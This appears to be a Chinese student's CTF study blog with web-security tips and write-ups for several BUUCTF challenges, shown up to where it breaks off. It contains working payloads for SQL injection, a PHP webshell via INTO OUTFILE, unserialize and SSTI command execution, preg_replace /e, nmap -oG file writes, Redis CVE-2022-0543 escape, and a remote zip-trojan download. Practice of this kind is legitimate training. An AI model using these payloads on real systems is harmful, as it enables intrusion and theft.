href="#11-3–11-9周" class="headerlink" title="11.3–11.9周"></a>11.3–11.9周</h1><h3 id="本周复现完毕newstar2024全部题目,week4-5做下来整体感觉偏难但是5反而比4简单(),buu做了5道题,极客大挑战做了3道,学到了很多新知识点。"><a href="#本周复现完毕newstar2024全部题目,week4-5做下来整体感觉偏难但是5反而比4简单(),buu做了5道题,极客大挑战做了3道,学到了很多新知识点。" class="headerlink" title="本周复现完毕newstar2024全部题目,week4-5做下来整体感觉偏难但是5反而比4简单(),buu做了5道题,极客大挑战做了3道,学到了很多新知识点。"></a>本周复现完毕newstar2024全部题目,week4-5做下来整体感觉偏难但是5反而比4简单(),buu做了5道题,极客大挑战做了3道,学到了很多新知识点。</h3><p> ps:学的有点杂,大部分还是对之前的知识点的补充和深入了解。<br> 1.sql注入过滤空格就用()将内容包裹起来,如select(table_name)from(information_schema.tables)<br> 过滤=就用like替代,过滤by union等说明过滤了联合注入,需要采用报错注入,(extractvalue(1, concat(0x7e, (select database())))),直接报错,并且回显到后面检测的数据库的原理继续注入<br> 2.文件上传类有时不会把文件自动解析成php,就需要用htaccess更改服务器配置,.htaccess被禁用可以尝试.user.ini<br> 3.本地文件读取,在对读取文件有长度限制,且通配符不可使用的情况下,应该采用文件描述符来读取目的文件,文件描述符是操作系统为进程维护的一个整数,每个进程有一个fd表,如/proc/self/fd/3,不行就往后试()<br> 4.md5两次后是0e…..纯数字的是179122048<br> 5.sql注入中select句段被禁用,可以尝试堆叠注入,同时可以使用handler命令直接读取表中的数据,例如语法:1’;HANDLER 表名 OPEN;HANDLER 表名 READ NEXT;HANDLER 表名 CLOSE;#根据题目类型插入布尔盲注或其他注入类型<br> 6.在严格过滤的环境下获取flag,在得知flag文件名称的情况下,无法通过正常方法直接访问得到,可以尝试污染404页面,例:在flask中可以使用setattr(NotFound, ‘description’, command_result)动态修改404页面的描述内容,再跟上执行命令获取flag,将flag命令回显到404页面<br> 7.目录穿越,利用Flask框架静态文件路由的潜在缺陷,绕过目录限制/../来读取目录,需要注意的是,直接在url中访问并不会成功,因为无法对其进行正确解析,使用burpsuite等改请求来访问目标目录,进而读取到源码<br> 8.jwt密码爆破,在得知密码的组成或大致范围之后,可以生成字典进行爆破,用jwtcrack-master,命令组成为python.exe .\crackjwt.py 当前cookie .\字典文件,需要放在根目录下<br> 9.cms类题后台任意文件下载,任意文件解压漏洞。若容器出网,在公网服务器上放置包含 PHP 木马的 ZIP 文件,再在题目上触发下载ZIP,触发解压之后运行对应文件中的php木马执行任意命令,例如下载filepath=apidata&action=start-download&type=0&download_url=http://公网IP/payload.zip解压filepath=apidata&action=file-upzip。若容器不出网,就需要先上传ZIP到服务器,再下载解压运行。<br> 10.ROT13字母替换密码,凯撒密码的一种,偏移量固定为13,文件目录或者flag格式有问题的时候可以试一下是不是移位加密过了<br> 11.__toString()是POP链的常见入口点,我们可以在其中调用其他方法或访问其他属性<br> 12.原型链污染中,通过修改原型对象,影响所有基于该原型的对象。process.env 包含所有环境变量,其中子进程会继承父进程的环境变量,NODE_OPTIONS特殊环境变量,用于传递命令行参数,child_process.fork()创建Node.js子进程,而后execSync()同步执行系统命令。通过这样,就可以通过环境变量执行任意代码,例如:require("child_process").execSync("目的命令 | base64 -d > /app/index.js")//<br> 13.如果在题目中需要更改或创建对象,应该使用put请求<br> 14.XSS跨站脚本攻击,XSS题目的典型就是有一个bot,flag通常就在这个bot的cookie里面。我们可以通过找到一处能够输入并查看的地方写入一个恶意代码到服务端,让bot去访问运行它,进而获得cookie。拿到cookie之后的回显问题,如果题目出网,可以写命令让它发送到我们的服务器上面;如果不出网,就可以写一个JS代码让bot模拟用户操作,将Cookie在之前找到的输入点进行读取<br> 15.Redis命令执⾏沙箱逃逸,CVE-2022-0543,Redis的Lua环境是一个公共Lua库,我们可以利用Lua的 package.loadlib函数,加载这个系统库,并调用其中的危险函数,从而执行任意命令。例如:先通过local io_l = package.loadlib(“/usr/lib/x86_64-linux-gnu/liblua5.1.so.0”, “luaopen_io”);找到目的package.loadlib函数,local io = io_l();提取表中的危险函数,local f = io.popen(“指定命令”, “r”);r用读取模式启动命令,返回一个文件句柄,将其保存在变量f中,local res = f:read(“*a”);结果保存在res中,return res返回res<br> 16.sql注入中若题目提示flag不在数据库,那么我们就需要getshell写入后门文件,写一个木马,例如:-1’union select 1,2,”<?php eval($_GET[1]);” into outfile “/var/www/html/1.php”–+再通过get的参数执行任意命令</p><h3 id="本周总结:基本完成了本周的学习计划,学到了很多新知识点,Redis沙箱逃逸,XSS跨站脚本攻击和cms后台任意文件下载等。本周学的有点多,部分知识点目前只做过对应的一道题,并没有完全掌握,还需要后续的训练"><a href="#本周总结:基本完成了本周的学习计划,学到了很多新知识点,Redis沙箱逃逸,XSS跨站脚本攻击和cms后台任意文件下载等。本周学的有点多,部分知识点目前只做过对应的一道题,并没有完全掌握,还需要后续的训练" class="headerlink" title="本周总结:基本完成了本周的学习计划,学到了很多新知识点,Redis沙箱逃逸,XSS跨站脚本攻击和cms后台任意文件下载等。本周学的有点多,部分知识点目前只做过对应的一道题,并没有完全掌握,还需要后续的训练"></a>本周总结:基本完成了本周的学习计划,学到了很多新知识点,Redis沙箱逃逸,XSS跨站脚本攻击和cms后台任意文件下载等。本周学的有点多,部分知识点目前只做过对应的一道题,并没有完全掌握,还需要后续的训练</h3><p>下周学习计划:再次尝试一下极客大挑战,多做一点buu的题,看能不能遇到新学的知识点,把知识点实战巩固一下</p><h1 id="11-17—11-23周"><a href="#11-17—11-23周" class="headerlink" title="11.17—11.23周"></a>11.17—11.23周</h1><p>本周总结:这周buu崩了,我也崩了,一直发烧,没有爽做题,也没有爽打游戏,不开心的一周,但是还是学到了一些新知识,也算是很开心的事情了。个人博客也搭建的差不多了,等明年1月前后域名备案之后应该就可以正式上线了,欢迎各位来玩~</p><h2 id="1-网鼎杯-2020-朱雀组-phpweb"><a href="#1-网鼎杯-2020-朱雀组-phpweb" class="headerlink" title="1.[网鼎杯 2020 朱雀组]phpweb"></a>1.[网鼎杯 2020 朱雀组]phpweb</h2><p>拿到题目访问一下,发现页面会自动刷新<img src="https://i-blog.csdnimg.cn/blog_migrate/61ab71c9a8c1f112c4aa569493eabf01.png" alt="在这里插入图片描述"></p><p>所以我们抓一下包<img src="https://i-blog.csdnimg.cn/blog_migrate/0499789c8210a128e0974eab7566e652.png" alt="在这里插入图片描述"></p><p>很明显date是一个php的函数,而p是其中的一个参数,表示输出时间。<br> 因此我们可以执行一下eval函数<img src="https://i-blog.csdnimg.cn/blog_migrate/38e13c463a71604b8ad38c4b23431990.png" alt="在这里插入图片描述"></p><p>很明显,被拦了。这时候我们可以考虑一下读取index.php的<a href="https://so.csdn.net/so/search?q=%E6%BA%90%E7%A0%81&spm=1001.2101.3001.7020">源码</a><br> 利用highlight_file函数</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">func=highlight_file&p=index.php</span><br></pre></td></tr></table></figure><p><img src="https://i-blog.csdnimg.cn/blog_migrate/9d9c7b41aa43fcf74f9a23cabf699ae3.png" alt="在这里插入图片描述"></p><p>得到<img src="https://i-blog.csdnimg.cn/blog_migrate/b4a1faaca13d98e591bce854f293a0a1.png" alt="在这里插入图片描述"></p><p>很明显这里的Test就是读取了func,需要你构造一个反序列化去绕过。</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><?php</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Test</span>{</span></span><br><span class="line"> var $p=<span class="string">"ls /"</span>;</span><br><span class="line"> var $func=<span class="string">"system"</span>;</span><br><span class="line">}</span><br><span class="line">$a =new Test();</span><br><span class="line">echo <span class="title function_">serialize</span><span class="params">($a)</span>;</span><br></pre></td></tr></table></figure><p>得到payload:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">func=unserialize&p=O:<span class="number">4</span>:<span class="string">"Test"</span>:<span class="number">2</span>:{s:<span class="number">1</span>:<span class="string">"p"</span>;s:<span class="number">4</span>:<span class="string">"ls /"</span>;s:<span class="number">4</span>:<span class="string">"func"</span>;s:<span class="number">6</span>:<span class="string">"system"</span>;}</span><br></pre></td></tr></table></figure><p>传入后得到<img src="https://i-blog.csdnimg.cn/blog_migrate/0d048bb3fe8859531ccef783e7b1d690.png" alt="在这里插入图片描述"></p><p>然后</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#构造payload</span><br><span class="line">#反序列化前的语句:find / -name flag*</span><br><span class="line">func=unserialize&p=O:<span class="number">4</span>:<span class="string">"Test"</span>:<span class="number">2</span>:{s:<span class="number">1</span>:<span class="string">"p"</span>;s:<span class="number">18</span>:<span class="string">"find / -name flag*"</span>;s:<span class="number">4</span>:<span class="string">"func"</span>;s:<span class="number">6</span>:<span class="string">"system"</span>;}</span><br></pre></td></tr></table></figure><p>找到存有flag 的文件夹<code>/tmp/flagoefiu4r93</code><img src="https://i-blog.csdnimg.cn/blog_migrate/25ddf6edb5f2f5f1166a221a8d35afce.png" alt="在这里插入图片描述"></p><p>最后找出flag:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#构造payload</span><br><span class="line">#反序列化前的语句:cat /tmp/flagoefiu4r93</span><br><span class="line">func=unserialize&p=O:<span class="number">4</span>:<span class="string">"Test"</span>:<span class="number">2</span>:{s:<span class="number">1</span>:<span class="string">"p"</span>;s:<span class="number">22</span>:<span class="string">"cat /tmp/flagoefiu4r93"</span>;s:<span class="number">4</span>:<span class="string">"func"</span>;s:<span class="number">6</span>:<span class="string">"system"</span>;}</span><br></pre></td></tr></table></figure><p><img src="https://i-blog.csdnimg.cn/blog_migrate/0407b52a419ce0fecb90cd14ac4d439d.png" alt="img"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag{1ffa98ad-ba5d-4ce9-83b1-bdbaa1b54302}</span><br></pre></td></tr></table></figure><h2 id="2-BJDCTF2020-The-mystery-of-ip"><a href="#2-BJDCTF2020-The-mystery-of-ip" class="headerlink" title="2.[BJDCTF2020]The mystery of ip"></a>2.[BJDCTF2020]The mystery of ip</h2><p><img src="https://i-blog.csdnimg.cn/blog_migrate/72973b03e737b882008029f2636feeb1.png" alt="在这里插入图片描述"></p><p>查看<code>hint</code>页面:<img src="https://i-blog.csdnimg.cn/blog_migrate/1c376f24aee082031d903098b92fbb32.png" alt="在这里插入图片描述"></p><p>结合题目名,IP的秘密,flag页面也出现了IP,猜测为X-Forwarded-For处有问题<br> 使用BurpSuite抓取数据包:</p><p><img src="https://i-blog.csdnimg.cn/blog_migrate/2df1f822baec2dc8fd6a1b552697fa3d.png" alt="在这里插入图片描述"></p><p>添加HTTP请求头:<img src="https://i-blog.csdnimg.cn/blog_migrate/4b5c788c40f1e9cefe95bab962d3c6ec.png" alt="在这里插入图片描述"></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">X-Forwarded-For: <span class="number">1</span></span><br></pre></td></tr></table></figure><p>发送数据包,得到回显页面:<img src="https://i-blog.csdnimg.cn/blog_migrate/27e5f7d7c94f4abba69119b7a247d30f.png" alt="在这里插入图片描述"></p><p>被成功执行,说明<code>XFF</code>可控,测试了半天,因为是php页面,所以没想到模版注入,通过查阅资料<br> <strong>Flask</strong>可能存在<strong>Jinjia2模版注入漏洞</strong><br> <strong>PHP</strong>可能存在<strong>Twig模版注入漏洞</strong></p><p>添加模版算式,检测其是否可被执行:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">X-Forwarded-For: {{<span class="number">7</span>*<span class="number">7</span>}}</span><br></pre></td></tr></table></figure><p><img src="https://i-blog.csdnimg.cn/blog_migrate/a02b080edbb2b0a10b2bb407a5d71dc2.png" alt="在这里插入图片描述"></p><p>模版中算式被成功执行,尝试是否能执行命令:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">X-Forwarded-For: {{<span class="title function_ invoke__">system</span>(<span class="string">'ls'</span>)}}</span><br></pre></td></tr></table></figure><p><img src="https://i-blog.csdnimg.cn/blog_migrate/06ada0dd7119b1322a047c38b4354245.png" alt="在这里插入图片描述"></p><p>命令可以被成功执行,查找flag的位置:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">X-Forwarded-For: {{<span class="title function_ invoke__">system</span>(<span class="string">'ls /'</span>)}}</span><br></pre></td></tr></table></figure><p><img src="https://i-blog.csdnimg.cn/blog_migrate/d638903efee7930af9721aa3f70f2423.png" alt="在这里插入图片描述"></p><p>在<code>/</code>目录下查找到flag,读取flag,构造payload:</p><img src="https://i-blog.csdnimg.cn/blog_migrate/efb5faa8e51142048bd12d3b2722154d.png" alt="在这里插入图片描述" style="zoom:150%;" /><h2 id="3-BJDCTF2020-ZJCTF,不过如此"><a href="#3-BJDCTF2020-ZJCTF,不过如此" class="headerlink" title="3.[BJDCTF2020]ZJCTF,不过如此"></a>3.[BJDCTF2020]ZJCTF,不过如此</h2><p>php特性</p><p>1.先看代码,提示了next.php,绕过题目的要求去回显next.php</p><p>2.可以看到要求存在text内容而且text内容强等于后面的,而且先通过这个if才能执行下面的file参数。</p><p><img src="https://i-blog.csdnimg.cn/blog_migrate/c1573b707aabe1d7cc04542ba758e166.png" alt="img"></p><p>3.看到用的是file_get_contents()函数打开text。想到用data://协议,可以想成创建了临时文件读取</p><p>?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php</p><p>得到页面源码,接着base64解码</p><p><img src="https://i-blog.csdnimg.cn/blog_migrate/0bfe0c67bc61ad2d596ba43c571ea9e3.png" alt="image-20240124204402834"></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">?php</span><br><span class="line"><span class="variable">$id</span> = <span class="variable">$_GET</span>[<span class="string">'id'</span>];</span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">'id'</span>] = <span class="variable">$id</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">complex</span>(<span class="params"><span class="variable">$re</span>, <span class="variable">$str</span></span>) </span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="title function_ invoke__">preg_replace</span>(</span><br><span class="line"> <span class="string">'/('</span> . <span class="variable">$re</span> . <span class="string">')/ei'</span>,</span><br><span class="line"> <span class="string">'strtolower("\\1")'</span>,</span><br><span class="line"> <span class="variable">$str</span></span><br><span class="line"> );</span><br><span class="line">}</span><br><span class="line"><span class="keyword">foreach</span>(<span class="variable">$_GET</span> <span class="keyword">as</span> <span class="variable">$re</span> => <span class="variable">$str</span>) {</span><br><span class="line"> <span class="keyword">echo</span> <span class="title function_ invoke__">complex</span>(<span class="variable">$re</span>, <span class="variable">$str</span>). <span class="string">"\n"</span>;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getFlag</span>(<span class="params"></span>)</span>{</span><br><span class="line"> @<span class="keyword">eval</span>(<span class="variable">$_GET</span>[<span class="string">'cmd'</span>]);</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>参数可以不管</p><p>可以看出,先传参执行complex,来执行getFlag()获得flag</p><p>可以先看下面,是其中代码解释</p><p><img src="https://i-blog.csdnimg.cn/blog_migrate/1fa9fede43fc7f562b8a19d4fc68260f.png" alt="image-20240124204821112"></p><p>在页面传参后使$re值为参变量123 $str值为${getflag()},来传入complex函数</p><p>这里解题的关键就是<code>preg_replace()+/e</code>存在代码执行漏洞</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/next.php?\S*=${<span class="title function_ invoke__">getflag</span>()}&cmd=<span class="title function_ invoke__">system</span>(<span class="string">'cat /flag'</span>);</span><br></pre></td></tr></table></figure><p><img src="https://i-blog.csdnimg.cn/blog_migrate/6eaf7473b475be2a149d26c64aa59647.png" alt="image-20240124211307795"></p><h2 id="4-BUUCTF-2018-Online-Tool"><a href="#4-BUUCTF-2018-Online-Tool" class="headerlink" title="4.[BUUCTF 2018]Online Tool"></a>4.[BUUCTF 2018]Online Tool</h2><p>首先要知道这escapeshellarg()和escapeshellcmd()两个函数组合会产生漏洞<img src="https://i-blog.csdnimg.cn/direct/ee438dc5781d43fc98e4a1053f04f0e9.png" alt="img"></p><p>首先看题,接收一个host参数,值自定义,结合字符串经过md5加密后创建目录并切换至目录(这里其实就可以联想到写文件了,创建了目录就是来放东西的)</p><p>执行了nmap命令,这里构造payload利用了nmap中的-oG方法,可以实现将命令和结果写到文件</p><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">?h</span>ost=<span class="string">' <?php echo `cat /flag`;?> -oG test.php '</span></span><br></pre></td></tr></table></figure><p>首先payload经过escapeshellarg()函数后会自动套上一对单引号并对内部单引号转义</p><p>即</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">''</span>\<span class="string">''</span> <span class="meta"><?php</span> <span class="keyword">echo</span> `cat /flag`;<span class="meta">?></span> -oG test.php <span class="string">'\''</span><span class="string">'</span></span><br></pre></td></tr></table></figure><p>最外层单引号是函数添加的</p><p>内部单引号被\转义,\也被添加上双引号</p><p>进入escapeshellcmd()函数后对\和不成对的单引号进行转义</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">''</span>\\<span class="string">''</span> <span class="meta"><?php</span> <span class="keyword">echo</span> `cat /flag`;<span class="meta">?></span> -oG test.php <span class="string">'\\'</span><span class="string">''</span></span><br></pre></td></tr></table></figure><p>这里单引号将payload分成了多份</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">''</span> \\ <span class="string">''</span> <span class="meta"><?php</span>......php <span class="string">'\\'</span> <span class="string">''</span></span><br></pre></td></tr></table></figure><p>这样payload就不会被单引号包裹,可以正常执行命令了</p><p>值得注意的是,因为后端是linux系统,在linux中,\代表转义符,system执行命令的参数是string类型,转义了也能正常执行,没被单引号包裹的\就是,被单引号包裹的仍是\</p><p>第二个值得注意的地方是:</p><p>最后的payload要加空格和’</p><p>不加空格最后文件名变为test.php\,会被解析为路径,test.php \后面的\会被忽略</p><p>不加单引号会变成test.php’,都无法正常执行<img src="https://i-blog.csdnimg.cn/direct/82e59df37b2e48e88878c7b109814712.png" alt="img"></p><h2 id="5-GXYCTF2019-禁止套娃"><a href="#5-GXYCTF2019-禁止套娃" class="headerlink" title="5.[GXYCTF2019]禁止套娃"></a>5.[GXYCTF2019]禁止套娃</h2><h3 id="这个题重点在于无参数绕过"><a href="#这个题重点在于无参数绕过" class="headerlink" title="这个题重点在于无参数绕过"></a>这个题重点在于无参数绕过</h3><p>首先来看一下这个界面</p><p><img src="https://i-blog.csdnimg.cn/blog_migrate/1457dfbfaf04375105c58b4cdeb3c947.png" alt="img"></p><p>查看源代码,目录文件扫描以及<a href="https://so.csdn.net/so/search?q=%E6%8A%93%E5%8C%85&spm=1001.2101.3001.7020">抓包</a>都没什么有价值的信息。但是web题如果没有什么功能页面,一定有什么提示。若提示也没有,一般就泄露了文件或者源码等。这题就是源码泄露 。使用GitHack</p><p>打开index的源码</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">"flag.php"</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"flag在哪里呢?<br>"</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'exp'</span>])){</span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">preg_match</span>(<span class="string">'/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i'</span>, <span class="variable">$_GET</span>[<span class="string">'exp'</span>])) {</span><br><span class="line"> <span class="keyword">if</span>(<span class="string">';'</span> === <span class="title function_ invoke__">preg_replace</span>(<span class="string">'/[a-z,_]+\((?R)?\)/'</span>, <span class="literal">NULL</span>, <span class="variable">$_GET</span>[<span class="string">'exp'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">preg_match</span>(<span class="string">'/et|na|info|dec|bin|hex|oct|pi|log/i'</span>, <span class="variable">$_GET</span>[<span class="string">'exp'</span>])) {</span><br><span class="line"> <span class="comment">// echo $_GET['exp'];</span></span><br><span class="line"> @<span class="keyword">eval</span>(<span class="variable">$_GET</span>[<span class="string">'exp'</span>]);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"还差一点哦!"</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"再好好想想!"</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"还想读flag,臭弟弟!"</span>);</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="comment">// highlight_file(__FILE__);</span></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>很明显,源码存在三层过滤。</p><p>1.第一层,过滤了伪协议,这里不考虑伪协议使用</p><p>2.正则表达式,/[a-z,_]+/</p><p> [a-z,_]:匹配字符与下划线</p><p> +:可匹配前一个表达式多次</p><p> (?R):整个表达式迭代匹配</p><p> (?R)?:允许”()”内出现1个或0个 比如:c(a()b()),c(a())</p><pre><code>所以这个正则表达式含义是匹配var_dump(scandir())这种无参数命令执行</code></pre><p>3.过滤了一些函数</p><p>scandir(‘.’)是返回当前目录,虽然我们无法传参,但是由于localeconv() 返回的数组第一个就是‘.’,current()取第一个值,那么current(localeconv())就能构造一个‘.’,那么以下就是一个简单的返回查看</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?exp=<span class="title function_ invoke__">var_dump</span>(<span class="title function_ invoke__">scandir</span>(<span class="title function_ invoke__">current</span>(<span class="title function_ invoke__">localeconv</span>())));</span><br></pre></td></tr></table></figure><p><img src="https://i-blog.csdnimg.cn/blog_migrate/b0e0ad8a87365b4e05e3c1bdad208de7.png" alt="img"></p><p>查看到flag.php在当先数组的第4个位置,所以需要移动指针</p><p> end(),next() ,prev() ,reset() ,each()好像不能重复套娃</p><p>因为flag在倒数第二个位置,所以反转数组,在移动指针到下一个即可</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?exp=<span class="title function_ invoke__">var_dump</span>(<span class="title function_ invoke__">show_source</span>(<span class="title function_ invoke__">next</span>(<span class="title function_ invoke__">array_reverse</span>(<span class="title function_ invoke__">scandir</span>(<span class="title function_ invoke__">current</span>(<span class="title function_ invoke__">localeconv</span>()))))));</span><br></pre></td></tr></table></figure><p><img src="https://i-blog.csdnimg.cn/blog_migrate/3ad1f535fcc5411a3dae1d41f9e36365.png" alt="img"></p><h2 id="6-GWCTF-2019-我有一个数据库"><a href="#6-GWCTF-2019-我有一个数据库" class="headerlink" title="6.[GWCTF 2019]我有一个数据库"></a>6.[GWCTF 2019]我有一个数据库</h2><p>上来一堆乱码还原:</p><p>扫一遍发现数据库登陆页面<img src="https://i-blog.csdnimg.cn/blog_migrate/b4fd1660e79e133613a624728be23c33.png" alt="在这里插入图片描述"></p><p>CVE-2018-12613-PhpMyadmin后台文件包含<img src="https://i-blog.csdnimg.cn/blog_migrate/67da621d97255400cac203a8977468e8.png" alt="在这里插入图片描述"></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (! <span class="keyword">empty</span>(<span class="variable">$_REQUEST</span>[<span class="string">'target'</span>])</span><br><span class="line"> && <span class="title function_ invoke__">is_string</span>(<span class="variable">$_REQUEST</span>[<span class="string">'target'</span>])</span><br><span class="line"> && ! <span class="title function_ invoke__">preg_match</span>(<span class="string">'/^index/'</span>, <span class="variable">$_REQUEST</span>[<span class="string">'target'</span>])</span><br><span class="line"> && ! <span class="title function_ invoke__">in_array</span>(<span class="variable">$_REQUEST</span>[<span class="string">'target'</span>], <span class="variable">$target_blacklist</span>)</span><br><span class="line"> && <span class="title class_">Core</span>::<span class="title function_ invoke__">checkPageValidity</span>(<span class="variable">$_REQUEST</span>[<span class="string">'target'</span>])</span><br><span class="line">) {</span><br><span class="line"> <span class="keyword">include</span> <span class="variable">$_REQUEST</span>[<span class="string">'target'</span>];</span><br><span class="line"> <span class="keyword">exit</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>target_blacklist没啥东西</p><p>Core::checkPageValidity($_REQUEST[‘target’]),Core类参数校验方法</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="built_in">static</span> <span class="function"><span class="keyword">function</span> <span class="title">checkPageValidity</span>(<span class="params">&<span class="variable">$page</span>, <span class="keyword">array</span> <span class="variable">$whitelist</span> = []</span>)</span></span><br><span class="line"><span class="function"> </span>{</span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">empty</span>(<span class="variable">$whitelist</span>)) {</span><br><span class="line"> <span class="variable">$whitelist</span> = <span class="built_in">self</span>::<span class="variable">$goto_whitelist</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> (! <span class="keyword">isset</span>(<span class="variable">$page</span>) || !<span class="title function_ invoke__">is_string</span>(<span class="variable">$page</span>)) {</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">in_array</span>(<span class="variable">$page</span>, <span class="variable">$whitelist</span>)) {</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$_page</span> = <span class="title function_ invoke__">mb_substr</span>(</span><br><span class="line"> <span class="variable">$page</span>,</span><br><span class="line"> <span class="number">0</span>,</span><br><span class="line"> <span class="title function_ invoke__">mb_strpos</span>(<span class="variable">$page</span> . <span class="string">'?'</span>, <span class="string">'?'</span>)</span><br><span class="line"> );</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">in_array</span>(<span class="variable">$_page</span>, <span class="variable">$whitelist</span>)) {</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$_page</span> = <span class="title function_ invoke__">urldecode</span>(<span class="variable">$page</span>);</span><br><span class="line"> <span class="variable">$_page</span> = <span class="title function_ invoke__">mb_substr</span>(</span><br><span class="line"> <span class="variable">$_page</span>,</span><br><span class="line"> <span class="number">0</span>,</span><br><span class="line"> <span class="title function_ invoke__">mb_strpos</span>(<span class="variable">$_page</span> . <span class="string">'?'</span>, <span class="string">'?'</span>)</span><br><span class="line"> );</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">in_array</span>(<span 